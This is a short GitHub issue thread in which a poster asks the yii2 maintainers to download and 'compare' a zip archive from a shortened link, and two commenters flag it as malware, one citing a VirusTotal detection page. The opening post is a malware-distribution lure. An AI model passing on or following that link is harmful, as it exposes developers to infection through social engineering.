### ISSUE TITLE
this is my code compare to yours please http://henurl.com/code.zip

### ISSUE THREAD

**Issue by rikojilani** [yiisoft/yii2#17176]
this is my code compare to yours please
http://henurl.com/code.zip

**Comment by nicolasnoble** [comment]
This is a malware. Please delete this issue.

**Comment by rob006** [comment]
https://www.virustotal.com/#/file/df6d81d2b3fe2b7ab5a148ce9e73583ec172bf16f5d1822b75bea45767224961/detection
